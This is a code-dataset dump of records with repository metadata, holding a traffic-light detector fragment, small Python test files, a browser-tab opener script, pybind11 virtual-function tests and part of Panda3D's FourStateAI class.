bb_image = np.multiply(bb_image, mask)
bb_image = cv2.inRange(bb_image, 200, 255)
red_area = bb_image[0:height//3, 0:width]
yellow_area = bb_image[height//3: 2*height//3, 0:width]
green_area = bb_image[2*height//3: height, 0:width]
red_cnt = cv2.countNonZero(red_area)
yellow_cnt = cv2.countNonZero(yellow_area)
green_cnt = cv2.countNonZero(green_area)
if red_cnt > yellow_cnt and red_cnt > green_cnt:
return TrafficLight.RED
elif yellow_cnt > red_cnt and yellow_cnt > green_cnt:
return TrafficLight.YELLOW
return TrafficLight.UNKNOWN
def bboxes_cb(self, bBoxes):
for box in bBoxes.bounding_boxes:
if box.Class == 'traffic light':
self.lastBBox = [[box.xmin, box.xmax], [box.ymin, box.ymax]]
self.lastBBoxT = rospy.get_time()
| true
| true
|
1c491965ebf5eabe4b86a82bc3deb1452f0648ec
| 127
|
py
|
Python
|
tests/unit/test_base.py
|
mballance/pyrctgen
|
eb47ed2039d36ab236b63e795b313feb499820bd
|
[
"Apache-2.0"
] | 1
|
2022-03-10T04:12:11.000Z
|
2022-03-10T04:12:11.000Z
|
tests/unit/test_base.py
|
mballance/pyrctgen
|
eb47ed2039d36ab236b63e795b313feb499820bd
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/test_base.py
|
mballance/pyrctgen
|
eb47ed2039d36ab236b63e795b313feb499820bd
|
[
"Apache-2.0"
] | null | null | null |
'''
Created on Mar 19, 2022
@author: mballance
'''
from unittest.case import TestCase
class TestBase(TestCase):
pass
| 12.7
| 34
| 0.692913
|
from unittest.case import TestCase
class TestBase(TestCase):
pass
| true
| true
|
1c491a219a3d6263ac2dc3e19499b0883225791f
| 634
|
py
|
Python
|
autotab.py
|
naveenapius/autotab
|
2f37fef748bde755de2e9aba6a51508809cd9a93
|
[
"MIT"
] | null | null | null |
autotab.py
|
naveenapius/autotab
|
2f37fef748bde755de2e9aba6a51508809cd9a93
|
[
"MIT"
] | null | null | null |
autotab.py
|
naveenapius/autotab
|
2f37fef748bde755de2e9aba6a51508809cd9a93
|
[
"MIT"
] | null | null | null |
import webbrowser as wb
browser = None  # change this to your desired browser, otherwise the default browser will be used
w = wb.get(using=browser)
try:
with open('sitelist.txt') as f: #opens sitelist for parsing
site_list = f.readlines()
try:
first_site = site_list[0]
w.open(first_site, new=1) #opens first site in a new window
except:
print("Site list is empty. Add some sites to open :)")
for i in site_list[1:]: #opens all other sites in previously opened window
w.open_new_tab(i)
except:
print("Ensure that file sitelist.txt is available in the working directory.")
#end
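# --- Illustrative sketch (editor's addition) ---
# What the `browser` knob above accepts: any name registered with the
# webbrowser module ('firefox', 'chrome', ...), with availability depending on
# the platform. Falling back to the default keeps the script portable:
try:
    w2 = wb.get('firefox')   # hypothetical choice; raises if not available
except wb.Error:
    w2 = wb.get()            # platform default browser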
| 33.368421
| 90
| 0.679811
|
import webbrowser as wb
browser = None
w = wb.get(using=browser)
try:
    with open('sitelist.txt') as f:
        site_list = f.readlines()
    try:
        first_site = site_list[0]
        w.open(first_site, new=1)
    except:
        print("Site list is empty. Add some sites to open :)")
    for i in site_list[1:]:
        w.open_new_tab(i)
except:
    print("Ensure that file sitelist.txt is available in the working directory.")
| true
| true
|
1c491a6881513f092499a32cda67c05701811890
| 1,775
|
py
|
Python
|
syspy/tests/test_shell.py
|
mrgarelli/PySys
|
f5e61b01ab43525b66f104ef3140b6d1c68e2ebc
|
[
"MIT"
] | 1
|
2019-09-02T17:18:26.000Z
|
2019-09-02T17:18:26.000Z
|
syspy/tests/test_shell.py
|
mrgarelli/PySys
|
f5e61b01ab43525b66f104ef3140b6d1c68e2ebc
|
[
"MIT"
] | null | null | null |
syspy/tests/test_shell.py
|
mrgarelli/PySys
|
f5e61b01ab43525b66f104ef3140b6d1c68e2ebc
|
[
"MIT"
] | null | null | null |
import pytest
from mock import patch
from mock.mock import Mock
call = Mock()
from ..shell import Shell
sh = Shell()
def setup_module(module):
pass
@patch('syspy.shell.os.rename')
def test_moving_a_file(mock_rename):
sh.mv('ex.txt', 'example')
mock_rename.assert_called_with('ex.txt', 'example')
@patch('syspy.shell.Shell.is_dir')
@patch('syspy.shell.Shell.command')
@patch('syspy.shell.open_file_with_vim')
class TestVim:
def test_editor_cannot_take_2_arguments(self, mock_open_vim, mock_command, mock_is_dir):
with pytest.raises(TypeError):
sh.vim(['one', 'two'])
assert not mock_open_vim.called
assert not mock_command.called
def test_editor_opens_file_from_list(self, mock_open_vim, mock_command, mock_is_dir):
mock_is_dir.return_value = False
ret = sh.vim(['ex.txt'])
assert ret == 0
mock_open_vim.assert_called_with('vim', 'ex.txt', 'r+')
assert not mock_command.called
def test_editor_opens_file_from_string(self, mock_open_vim, mock_command, mock_is_dir):
mock_is_dir.return_value = False
ret = sh.vim('ex.txt')
assert ret == 0
mock_open_vim.assert_called_with('vim', 'ex.txt', 'r+')
assert not mock_command.called
@patch('syspy.shell.os.environ.get')
def test_editor_uses_system_editor(
self, mock_environment_get, mock_open_vim, mock_command, mock_is_dir
):
mock_is_dir.return_value = False
ret = sh.vim('ex.txt', SystemEditor=True)
assert mock_environment_get.called
assert mock_open_vim.called
assert ret == 0
assert not mock_command.called
def test_editor_empty_call(self, mock_open_vim, mock_command, mock_is_dir):
ret = sh.vim([])
assert ret == 0
mock_command.assert_called_with(['vim'])
def teardown_module(module):
pass
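# --- Illustrative sketch (editor's addition, not part of the original tests) ---
# Why the mock arguments in TestVim arrive in that order: stacked @patch
# decorators apply bottom-up, so the decorator closest to the function supplies
# the first injected argument. A self-contained demonstration:
from unittest.mock import patch as _patch

@_patch('os.rename')   # outermost -> injected last
@_patch('os.remove')   # innermost -> injected first
def _demo(mock_remove, mock_rename):
    import os
    os.remove('a')
    os.rename('a', 'b')
    assert mock_remove.called and mock_rename.called

_demo()  # runs without touching the filesystem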
| 28.629032
| 90
| 0.729577
|
import pytest
from mock import patch
from mock.mock import Mock
call = Mock()
from ..shell import Shell
sh = Shell()
def setup_module(module):
pass
@patch('syspy.shell.os.rename')
def test_moving_a_file(mock_rename):
sh.mv('ex.txt', 'example')
mock_rename.assert_called_with('ex.txt', 'example')
@patch('syspy.shell.Shell.is_dir')
@patch('syspy.shell.Shell.command')
@patch('syspy.shell.open_file_with_vim')
class TestVim:
def test_editor_cannot_take_2_arguments(self, mock_open_vim, mock_command, mock_is_dir):
with pytest.raises(TypeError):
sh.vim(['one', 'two'])
assert not mock_open_vim.called
assert not mock_command.called
def test_editor_opens_file_from_list(self, mock_open_vim, mock_command, mock_is_dir):
mock_is_dir.return_value = False
ret = sh.vim(['ex.txt'])
assert ret == 0
mock_open_vim.assert_called_with('vim', 'ex.txt', 'r+')
assert not mock_command.called
def test_editor_opens_file_from_string(self, mock_open_vim, mock_command, mock_is_dir):
mock_is_dir.return_value = False
ret = sh.vim('ex.txt')
assert ret == 0
mock_open_vim.assert_called_with('vim', 'ex.txt', 'r+')
assert not mock_command.called
@patch('syspy.shell.os.environ.get')
def test_editor_uses_system_editor(
self, mock_environment_get, mock_open_vim, mock_command, mock_is_dir
):
mock_is_dir.return_value = False
ret = sh.vim('ex.txt', SystemEditor=True)
assert mock_environment_get.called
assert mock_open_vim.called
assert ret == 0
assert not mock_command.called
def test_editor_empty_call(self, mock_open_vim, mock_command, mock_is_dir):
ret = sh.vim([])
assert ret == 0
mock_command.assert_called_with(['vim'])
def teardown_module(module):
pass
| true
| true
|
1c491aaaab3a0c1e9e4b5ef4ecb72261a1b51700
| 11,343
|
py
|
Python
|
src/libs/pybind/tests/test_virtual_functions.py
|
arttnba3/ICTFE
|
b371ba91e3b8a203997fca5e07c052bbfad10d1d
|
[
"MIT"
] | 37
|
2020-03-26T10:15:59.000Z
|
2020-05-25T16:57:29.000Z
|
src/libs/pybind/tests/test_virtual_functions.py
|
arttnba3/ICTFE
|
b371ba91e3b8a203997fca5e07c052bbfad10d1d
|
[
"MIT"
] | 2
|
2020-05-30T12:31:47.000Z
|
2020-07-30T17:09:41.000Z
|
src/libs/pybind/tests/test_virtual_functions.py
|
arttnba3/ICTFE
|
b371ba91e3b8a203997fca5e07c052bbfad10d1d
|
[
"MIT"
] | 4
|
2020-03-29T18:12:16.000Z
|
2020-05-17T01:15:23.000Z
|
import pytest
from pybind11_tests import virtual_functions as m
from pybind11_tests import ConstructorStats
def test_override(capture, msg):
class ExtendedExampleVirt(m.ExampleVirt):
def __init__(self, state):
super(ExtendedExampleVirt, self).__init__(state + 1)
self.data = "Hello world"
def run(self, value):
print('ExtendedExampleVirt::run(%i), calling parent..' % value)
return super(ExtendedExampleVirt, self).run(value + 1)
def run_bool(self):
print('ExtendedExampleVirt::run_bool()')
return False
def get_string1(self):
return "override1"
def pure_virtual(self):
print('ExtendedExampleVirt::pure_virtual(): %s' % self.data)
class ExtendedExampleVirt2(ExtendedExampleVirt):
def __init__(self, state):
super(ExtendedExampleVirt2, self).__init__(state + 1)
def get_string2(self):
return "override2"
ex12 = m.ExampleVirt(10)
with capture:
assert m.runExampleVirt(ex12, 20) == 30
assert capture == """
Original implementation of ExampleVirt::run(state=10, value=20, str1=default1, str2=default2)
""" # noqa: E501 line too long
with pytest.raises(RuntimeError) as excinfo:
m.runExampleVirtVirtual(ex12)
assert msg(excinfo.value) == 'Tried to call pure virtual function "ExampleVirt::pure_virtual"'
ex12p = ExtendedExampleVirt(10)
with capture:
assert m.runExampleVirt(ex12p, 20) == 32
assert capture == """
ExtendedExampleVirt::run(20), calling parent..
Original implementation of ExampleVirt::run(state=11, value=21, str1=override1, str2=default2)
""" # noqa: E501 line too long
with capture:
assert m.runExampleVirtBool(ex12p) is False
assert capture == "ExtendedExampleVirt::run_bool()"
with capture:
m.runExampleVirtVirtual(ex12p)
assert capture == "ExtendedExampleVirt::pure_virtual(): Hello world"
ex12p2 = ExtendedExampleVirt2(15)
with capture:
assert m.runExampleVirt(ex12p2, 50) == 68
assert capture == """
ExtendedExampleVirt::run(50), calling parent..
Original implementation of ExampleVirt::run(state=17, value=51, str1=override1, str2=override2)
""" # noqa: E501 line too long
cstats = ConstructorStats.get(m.ExampleVirt)
assert cstats.alive() == 3
del ex12, ex12p, ex12p2
assert cstats.alive() == 0
assert cstats.values() == ['10', '11', '17']
assert cstats.copy_constructions == 0
assert cstats.move_constructions >= 0
def test_alias_delay_initialization1(capture):
"""`A` only initializes its trampoline class when we inherit from it
If we just create and use an A instance directly, the trampoline initialization is
bypassed and we only initialize an A() instead (for performance reasons).
"""
class B(m.A):
def __init__(self):
super(B, self).__init__()
def f(self):
print("In python f()")
# C++ version
with capture:
a = m.A()
m.call_f(a)
del a
pytest.gc_collect()
assert capture == "A.f()"
# Python version
with capture:
b = B()
m.call_f(b)
del b
pytest.gc_collect()
assert capture == """
PyA.PyA()
PyA.f()
In python f()
PyA.~PyA()
"""
def test_alias_delay_initialization2(capture):
"""`A2`, unlike the above, is configured to always initialize the alias
While the extra initialization and extra class layer has small virtual dispatch
performance penalty, it also allows us to do more things with the trampoline
class such as defining local variables and performing construction/destruction.
"""
class B2(m.A2):
def __init__(self):
super(B2, self).__init__()
def f(self):
print("In python B2.f()")
# No python subclass version
with capture:
a2 = m.A2()
m.call_f(a2)
del a2
pytest.gc_collect()
a3 = m.A2(1)
m.call_f(a3)
del a3
pytest.gc_collect()
assert capture == """
PyA2.PyA2()
PyA2.f()
A2.f()
PyA2.~PyA2()
PyA2.PyA2()
PyA2.f()
A2.f()
PyA2.~PyA2()
"""
# Python subclass version
with capture:
b2 = B2()
m.call_f(b2)
del b2
pytest.gc_collect()
assert capture == """
PyA2.PyA2()
PyA2.f()
In python B2.f()
PyA2.~PyA2()
"""
# PyPy: Reference count > 1 causes call with noncopyable instance
# to fail in ncv1.print_nc()
@pytest.unsupported_on_pypy
@pytest.mark.skipif(not hasattr(m, "NCVirt"), reason="NCVirt test broken on ICPC")
def test_move_support():
class NCVirtExt(m.NCVirt):
def get_noncopyable(self, a, b):
# Constructs and returns a new instance:
nc = m.NonCopyable(a * a, b * b)
return nc
def get_movable(self, a, b):
# Return a referenced copy
self.movable = m.Movable(a, b)
return self.movable
class NCVirtExt2(m.NCVirt):
def get_noncopyable(self, a, b):
# Keep a reference: this is going to throw an exception
self.nc = m.NonCopyable(a, b)
return self.nc
def get_movable(self, a, b):
# Return a new instance without storing it
return m.Movable(a, b)
ncv1 = NCVirtExt()
assert ncv1.print_nc(2, 3) == "36"
assert ncv1.print_movable(4, 5) == "9"
ncv2 = NCVirtExt2()
assert ncv2.print_movable(7, 7) == "14"
# Don't check the exception message here because it differs under debug/non-debug mode
with pytest.raises(RuntimeError):
ncv2.print_nc(9, 9)
nc_stats = ConstructorStats.get(m.NonCopyable)
mv_stats = ConstructorStats.get(m.Movable)
assert nc_stats.alive() == 1
assert mv_stats.alive() == 1
del ncv1, ncv2
assert nc_stats.alive() == 0
assert mv_stats.alive() == 0
assert nc_stats.values() == ['4', '9', '9', '9']
assert mv_stats.values() == ['4', '5', '7', '7']
assert nc_stats.copy_constructions == 0
assert mv_stats.copy_constructions == 1
assert nc_stats.move_constructions >= 0
assert mv_stats.move_constructions >= 0
def test_dispatch_issue(msg):
"""#159: virtual function dispatch has problems with similar-named functions"""
class PyClass1(m.DispatchIssue):
def dispatch(self):
return "Yay.."
class PyClass2(m.DispatchIssue):
def dispatch(self):
with pytest.raises(RuntimeError) as excinfo:
super(PyClass2, self).dispatch()
assert msg(excinfo.value) == 'Tried to call pure virtual function "Base::dispatch"'
p = PyClass1()
return m.dispatch_issue_go(p)
b = PyClass2()
assert m.dispatch_issue_go(b) == "Yay.."
def test_override_ref():
"""#392/397: overriding reference-returning functions"""
o = m.OverrideTest("asdf")
# Not allowed (see associated .cpp comment)
# i = o.str_ref()
# assert o.str_ref() == "asdf"
assert o.str_value() == "asdf"
assert o.A_value().value == "hi"
a = o.A_ref()
assert a.value == "hi"
a.value = "bye"
assert a.value == "bye"
def test_inherited_virtuals():
class AR(m.A_Repeat):
def unlucky_number(self):
return 99
class AT(m.A_Tpl):
def unlucky_number(self):
return 999
obj = AR()
assert obj.say_something(3) == "hihihi"
assert obj.unlucky_number() == 99
assert obj.say_everything() == "hi 99"
obj = AT()
assert obj.say_something(3) == "hihihi"
assert obj.unlucky_number() == 999
assert obj.say_everything() == "hi 999"
for obj in [m.B_Repeat(), m.B_Tpl()]:
assert obj.say_something(3) == "B says hi 3 times"
assert obj.unlucky_number() == 13
assert obj.lucky_number() == 7.0
assert obj.say_everything() == "B says hi 1 times 13"
for obj in [m.C_Repeat(), m.C_Tpl()]:
assert obj.say_something(3) == "B says hi 3 times"
assert obj.unlucky_number() == 4444
assert obj.lucky_number() == 888.0
assert obj.say_everything() == "B says hi 1 times 4444"
class CR(m.C_Repeat):
def lucky_number(self):
return m.C_Repeat.lucky_number(self) + 1.25
obj = CR()
assert obj.say_something(3) == "B says hi 3 times"
assert obj.unlucky_number() == 4444
assert obj.lucky_number() == 889.25
assert obj.say_everything() == "B says hi 1 times 4444"
class CT(m.C_Tpl):
pass
obj = CT()
assert obj.say_something(3) == "B says hi 3 times"
assert obj.unlucky_number() == 4444
assert obj.lucky_number() == 888.0
assert obj.say_everything() == "B says hi 1 times 4444"
class CCR(CR):
def lucky_number(self):
return CR.lucky_number(self) * 10
obj = CCR()
assert obj.say_something(3) == "B says hi 3 times"
assert obj.unlucky_number() == 4444
assert obj.lucky_number() == 8892.5
assert obj.say_everything() == "B says hi 1 times 4444"
class CCT(CT):
def lucky_number(self):
return CT.lucky_number(self) * 1000
obj = CCT()
assert obj.say_something(3) == "B says hi 3 times"
assert obj.unlucky_number() == 4444
assert obj.lucky_number() == 888000.0
assert obj.say_everything() == "B says hi 1 times 4444"
class DR(m.D_Repeat):
def unlucky_number(self):
return 123
def lucky_number(self):
return 42.0
for obj in [m.D_Repeat(), m.D_Tpl()]:
assert obj.say_something(3) == "B says hi 3 times"
assert obj.unlucky_number() == 4444
assert obj.lucky_number() == 888.0
assert obj.say_everything() == "B says hi 1 times 4444"
obj = DR()
assert obj.say_something(3) == "B says hi 3 times"
assert obj.unlucky_number() == 123
assert obj.lucky_number() == 42.0
assert obj.say_everything() == "B says hi 1 times 123"
class DT(m.D_Tpl):
def say_something(self, times):
return "DT says:" + (' quack' * times)
def unlucky_number(self):
return 1234
def lucky_number(self):
return -4.25
obj = DT()
assert obj.say_something(3) == "DT says: quack quack quack"
assert obj.unlucky_number() == 1234
assert obj.lucky_number() == -4.25
assert obj.say_everything() == "DT says: quack 1234"
class DT2(DT):
def say_something(self, times):
return "DT2: " + ('QUACK' * times)
def unlucky_number(self):
return -3
class BT(m.B_Tpl):
def say_something(self, times):
return "BT" * times
def unlucky_number(self):
return -7
def lucky_number(self):
return -1.375
obj = BT()
assert obj.say_something(3) == "BTBTBT"
assert obj.unlucky_number() == -7
assert obj.lucky_number() == -1.375
assert obj.say_everything() == "BT -7"
def test_issue_1454():
# Fix issue #1454 (crash when acquiring/releasing GIL on another thread in Python 2.7)
m.test_gil()
m.test_gil_from_thread()
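# --- Illustrative sketch (editor's addition, not part of the original tests) ---
# What the C++-side trampolines make possible, in pure-Python miniature: a
# base-typed call site still reaches the Python override. (The real m.call_f
# crosses the C++/Python boundary; this stand-in does not.)
class _Base:
    def f(self):
        return "Base.f"

def _call_f(obj):          # stand-in for the C++ m.call_f
    return obj.f()

class _Derived(_Base):
    def f(self):
        return "Derived.f"

assert _call_f(_Base()) == "Base.f"
assert _call_f(_Derived()) == "Derived.f"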
| 29.771654
| 103
| 0.605572
|
import pytest
from pybind11_tests import virtual_functions as m
from pybind11_tests import ConstructorStats
def test_override(capture, msg):
class ExtendedExampleVirt(m.ExampleVirt):
def __init__(self, state):
super(ExtendedExampleVirt, self).__init__(state + 1)
self.data = "Hello world"
def run(self, value):
print('ExtendedExampleVirt::run(%i), calling parent..' % value)
return super(ExtendedExampleVirt, self).run(value + 1)
def run_bool(self):
print('ExtendedExampleVirt::run_bool()')
return False
def get_string1(self):
return "override1"
def pure_virtual(self):
print('ExtendedExampleVirt::pure_virtual(): %s' % self.data)
class ExtendedExampleVirt2(ExtendedExampleVirt):
def __init__(self, state):
super(ExtendedExampleVirt2, self).__init__(state + 1)
def get_string2(self):
return "override2"
ex12 = m.ExampleVirt(10)
with capture:
assert m.runExampleVirt(ex12, 20) == 30
assert capture == """
Original implementation of ExampleVirt::run(state=10, value=20, str1=default1, str2=default2)
"""
with pytest.raises(RuntimeError) as excinfo:
m.runExampleVirtVirtual(ex12)
assert msg(excinfo.value) == 'Tried to call pure virtual function "ExampleVirt::pure_virtual"'
ex12p = ExtendedExampleVirt(10)
with capture:
assert m.runExampleVirt(ex12p, 20) == 32
assert capture == """
ExtendedExampleVirt::run(20), calling parent..
Original implementation of ExampleVirt::run(state=11, value=21, str1=override1, str2=default2)
""" with capture:
assert m.runExampleVirtBool(ex12p) is False
assert capture == "ExtendedExampleVirt::run_bool()"
with capture:
m.runExampleVirtVirtual(ex12p)
assert capture == "ExtendedExampleVirt::pure_virtual(): Hello world"
ex12p2 = ExtendedExampleVirt2(15)
with capture:
assert m.runExampleVirt(ex12p2, 50) == 68
assert capture == """
ExtendedExampleVirt::run(50), calling parent..
Original implementation of ExampleVirt::run(state=17, value=51, str1=override1, str2=override2)
"""
cstats = ConstructorStats.get(m.ExampleVirt)
assert cstats.alive() == 3
del ex12, ex12p, ex12p2
assert cstats.alive() == 0
assert cstats.values() == ['10', '11', '17']
assert cstats.copy_constructions == 0
assert cstats.move_constructions >= 0
def test_alias_delay_initialization1(capture):
class B(m.A):
def __init__(self):
super(B, self).__init__()
def f(self):
print("In python f()")
with capture:
a = m.A()
m.call_f(a)
del a
pytest.gc_collect()
assert capture == "A.f()"
with capture:
b = B()
m.call_f(b)
del b
pytest.gc_collect()
assert capture == """
PyA.PyA()
PyA.f()
In python f()
PyA.~PyA()
"""
def test_alias_delay_initialization2(capture):
class B2(m.A2):
def __init__(self):
super(B2, self).__init__()
def f(self):
print("In python B2.f()")
with capture:
a2 = m.A2()
m.call_f(a2)
del a2
pytest.gc_collect()
a3 = m.A2(1)
m.call_f(a3)
del a3
pytest.gc_collect()
assert capture == """
PyA2.PyA2()
PyA2.f()
A2.f()
PyA2.~PyA2()
PyA2.PyA2()
PyA2.f()
A2.f()
PyA2.~PyA2()
"""
with capture:
b2 = B2()
m.call_f(b2)
del b2
pytest.gc_collect()
assert capture == """
PyA2.PyA2()
PyA2.f()
In python B2.f()
PyA2.~PyA2()
"""
@pytest.unsupported_on_pypy
@pytest.mark.skipif(not hasattr(m, "NCVirt"), reason="NCVirt test broken on ICPC")
def test_move_support():
class NCVirtExt(m.NCVirt):
def get_noncopyable(self, a, b):
nc = m.NonCopyable(a * a, b * b)
return nc
def get_movable(self, a, b):
self.movable = m.Movable(a, b)
return self.movable
class NCVirtExt2(m.NCVirt):
def get_noncopyable(self, a, b):
self.nc = m.NonCopyable(a, b)
return self.nc
def get_movable(self, a, b):
return m.Movable(a, b)
ncv1 = NCVirtExt()
assert ncv1.print_nc(2, 3) == "36"
assert ncv1.print_movable(4, 5) == "9"
ncv2 = NCVirtExt2()
assert ncv2.print_movable(7, 7) == "14"
with pytest.raises(RuntimeError):
ncv2.print_nc(9, 9)
nc_stats = ConstructorStats.get(m.NonCopyable)
mv_stats = ConstructorStats.get(m.Movable)
assert nc_stats.alive() == 1
assert mv_stats.alive() == 1
del ncv1, ncv2
assert nc_stats.alive() == 0
assert mv_stats.alive() == 0
assert nc_stats.values() == ['4', '9', '9', '9']
assert mv_stats.values() == ['4', '5', '7', '7']
assert nc_stats.copy_constructions == 0
assert mv_stats.copy_constructions == 1
assert nc_stats.move_constructions >= 0
assert mv_stats.move_constructions >= 0
def test_dispatch_issue(msg):
class PyClass1(m.DispatchIssue):
def dispatch(self):
return "Yay.."
class PyClass2(m.DispatchIssue):
def dispatch(self):
with pytest.raises(RuntimeError) as excinfo:
super(PyClass2, self).dispatch()
assert msg(excinfo.value) == 'Tried to call pure virtual function "Base::dispatch"'
p = PyClass1()
return m.dispatch_issue_go(p)
b = PyClass2()
assert m.dispatch_issue_go(b) == "Yay.."
def test_override_ref():
o = m.OverrideTest("asdf")
# Not allowed (see associated .cpp comment)
# i = o.str_ref()
# assert o.str_ref() == "asdf"
assert o.str_value() == "asdf"
assert o.A_value().value == "hi"
a = o.A_ref()
assert a.value == "hi"
a.value = "bye"
assert a.value == "bye"
def test_inherited_virtuals():
class AR(m.A_Repeat):
def unlucky_number(self):
return 99
class AT(m.A_Tpl):
def unlucky_number(self):
return 999
obj = AR()
assert obj.say_something(3) == "hihihi"
assert obj.unlucky_number() == 99
assert obj.say_everything() == "hi 99"
obj = AT()
assert obj.say_something(3) == "hihihi"
assert obj.unlucky_number() == 999
assert obj.say_everything() == "hi 999"
for obj in [m.B_Repeat(), m.B_Tpl()]:
assert obj.say_something(3) == "B says hi 3 times"
assert obj.unlucky_number() == 13
assert obj.lucky_number() == 7.0
assert obj.say_everything() == "B says hi 1 times 13"
for obj in [m.C_Repeat(), m.C_Tpl()]:
assert obj.say_something(3) == "B says hi 3 times"
assert obj.unlucky_number() == 4444
assert obj.lucky_number() == 888.0
assert obj.say_everything() == "B says hi 1 times 4444"
class CR(m.C_Repeat):
def lucky_number(self):
return m.C_Repeat.lucky_number(self) + 1.25
obj = CR()
assert obj.say_something(3) == "B says hi 3 times"
assert obj.unlucky_number() == 4444
assert obj.lucky_number() == 889.25
assert obj.say_everything() == "B says hi 1 times 4444"
class CT(m.C_Tpl):
pass
obj = CT()
assert obj.say_something(3) == "B says hi 3 times"
assert obj.unlucky_number() == 4444
assert obj.lucky_number() == 888.0
assert obj.say_everything() == "B says hi 1 times 4444"
class CCR(CR):
def lucky_number(self):
return CR.lucky_number(self) * 10
obj = CCR()
assert obj.say_something(3) == "B says hi 3 times"
assert obj.unlucky_number() == 4444
assert obj.lucky_number() == 8892.5
assert obj.say_everything() == "B says hi 1 times 4444"
class CCT(CT):
def lucky_number(self):
return CT.lucky_number(self) * 1000
obj = CCT()
assert obj.say_something(3) == "B says hi 3 times"
assert obj.unlucky_number() == 4444
assert obj.lucky_number() == 888000.0
assert obj.say_everything() == "B says hi 1 times 4444"
class DR(m.D_Repeat):
def unlucky_number(self):
return 123
def lucky_number(self):
return 42.0
for obj in [m.D_Repeat(), m.D_Tpl()]:
assert obj.say_something(3) == "B says hi 3 times"
assert obj.unlucky_number() == 4444
assert obj.lucky_number() == 888.0
assert obj.say_everything() == "B says hi 1 times 4444"
obj = DR()
assert obj.say_something(3) == "B says hi 3 times"
assert obj.unlucky_number() == 123
assert obj.lucky_number() == 42.0
assert obj.say_everything() == "B says hi 1 times 123"
class DT(m.D_Tpl):
def say_something(self, times):
return "DT says:" + (' quack' * times)
def unlucky_number(self):
return 1234
def lucky_number(self):
return -4.25
obj = DT()
assert obj.say_something(3) == "DT says: quack quack quack"
assert obj.unlucky_number() == 1234
assert obj.lucky_number() == -4.25
assert obj.say_everything() == "DT says: quack 1234"
class DT2(DT):
def say_something(self, times):
return "DT2: " + ('QUACK' * times)
def unlucky_number(self):
return -3
class BT(m.B_Tpl):
def say_something(self, times):
return "BT" * times
def unlucky_number(self):
return -7
def lucky_number(self):
return -1.375
obj = BT()
assert obj.say_something(3) == "BTBTBT"
assert obj.unlucky_number() == -7
assert obj.lucky_number() == -1.375
assert obj.say_everything() == "BT -7"
def test_issue_1454():
# Fix issue #1454 (crash when acquiring/releasing GIL on another thread in Python 2.7)
m.test_gil()
m.test_gil_from_thread()
| true
| true
|
1c491aaecf3820639d4577824689582c9c1e2b3d
| 9,122
|
py
|
Python
|
dependencies/panda/Panda3D-1.10.0-x64/direct/fsm/FourStateAI.py
|
CrankySupertoon01/Toontown-2
|
60893d104528a8e7eb4aced5d0015f22e203466d
|
[
"MIT"
] | 1
|
2021-02-13T22:40:50.000Z
|
2021-02-13T22:40:50.000Z
|
dependencies/panda/Panda3D-1.10.0-x64/direct/fsm/FourStateAI.py
|
CrankySupertoonArchive/Toontown-2
|
60893d104528a8e7eb4aced5d0015f22e203466d
|
[
"MIT"
] | 1
|
2018-07-28T20:07:04.000Z
|
2018-07-30T18:28:34.000Z
|
dependencies/panda/Panda3D-1.10.0-x64/direct/fsm/FourStateAI.py
|
CrankySupertoonArchive/Toontown-2
|
60893d104528a8e7eb4aced5d0015f22e203466d
|
[
"MIT"
] | 2
|
2019-12-02T01:39:10.000Z
|
2021-02-13T22:41:00.000Z
|
"""Undocumented Module"""
__all__ = ['FourStateAI']
from direct.directnotify import DirectNotifyGlobal
#import DistributedObjectAI
import ClassicFSM
import State
from direct.task import Task
class FourStateAI:
"""
Generic four state ClassicFSM base class.
This is a mix-in class that expects that your derived class
is a DistributedObjectAI.
Inherit from FourStateFSM and pass in your states. Two of
    the states should be opposites of each other and the other
two should be the transition states between the first two.
E.g.
+--------+
-->| closed | --
| +--------+ |
| |
| v
+---------+ +---------+
| closing |<----->| opening |
+---------+ +---------+
^ |
| |
| +------+ |
----| open |<---
+------+
There is a fifth off state, but that is an implementation
detail (and that's why it's not called a five state ClassicFSM).
I found that this pattern repeated in several things I was
working on, so this base class was created.
"""
notify = DirectNotifyGlobal.directNotify.newCategory('FourStateAI')
def __init__(self, names, durations = [0, 1, None, 1, 1]):
"""
names is a list of state names
E.g.
['off', 'opening', 'open', 'closing', 'closed',]
e.g. 2:
['off', 'locking', 'locked', 'unlocking', 'unlocked',]
e.g. 3:
['off', 'deactivating', 'deactive', 'activating', 'activated',]
durations is a list of durations in seconds or None values.
The list of duration values should be the same length
as the list of state names and the lists correspond.
For each state, after n seconds, the ClassicFSM will move to
the next state. That does not happen for any duration
values of None.
More Details
Here is a diagram showing the where the names from the list
are used:
+---------+
| 0 (off) |----> (any other state and vice versa).
+---------+
+--------+
-->| 4 (on) |---
| +--------+ |
| |
| v
+---------+ +---------+
| 3 (off) |<----->| 1 (off) |
+---------+ +---------+
^ |
| |
| +---------+ |
--| 2 (off) |<--
+---------+
        Each state also has an associated on or off value. The only
        state that is 'on' is state 4. So, the transition states
        between off and on (states 1 and 3) are also considered
        off (and so is state 2, which is the opposite of state 4 and
        therefore the opposite of 'on').
"""
self.stateIndex = 0
assert self.debugPrint(
"FourStateAI(names=%s, durations=%s)"
%(names, durations))
self.doLaterTask = None
assert len(names) == 5
assert len(names) == len(durations)
self.names = names
self.durations = durations
self.states = {
0: State.State(names[0],
self.enterState0,
self.exitState0,
[names[1],
names[2],
names[3],
names[4]]),
1: State.State(names[1],
self.enterState1,
self.exitState1,
[names[2], names[3]]),
2: State.State(names[2],
self.enterState2,
self.exitState2,
[names[3]]),
3: State.State(names[3],
self.enterState3,
self.exitState3,
[names[4], names[1]]),
4: State.State(names[4],
self.enterState4,
self.exitState4,
[names[1]]),
}
self.fsm = ClassicFSM.ClassicFSM('FourState',
self.states.values(),
# Initial State
names[0],
# Final State
names[0],
)
self.fsm.enterInitialState()
def delete(self):
assert self.debugPrint("delete()")
if self.doLaterTask is not None:
self.doLaterTask.remove()
del self.doLaterTask
del self.states
del self.fsm
def getState(self):
assert self.debugPrint("getState() returning %s"%(self.stateIndex,))
return [self.stateIndex]
def sendState(self):
assert self.debugPrint("sendState()")
self.sendUpdate('setState', self.getState())
def setIsOn(self, isOn):
assert self.debugPrint("setIsOn(isOn=%s)"%(isOn,))
if isOn:
if self.stateIndex != 4:
# ...if it's not On; request turning on:
self.fsm.request(self.states[3])
else:
if self.stateIndex != 2:
# ...if it's not Off; request turning off:
self.fsm.request(self.states[1])
#if isOn:
# nextState = (4, 3, 3, 4, None)[self.stateIndex]
#else:
# nextState = (2, 2, None, 1, 1)[self.stateIndex]
#if nextState is not None:
# self.fsm.request(self.states[nextState])
def isOn(self):
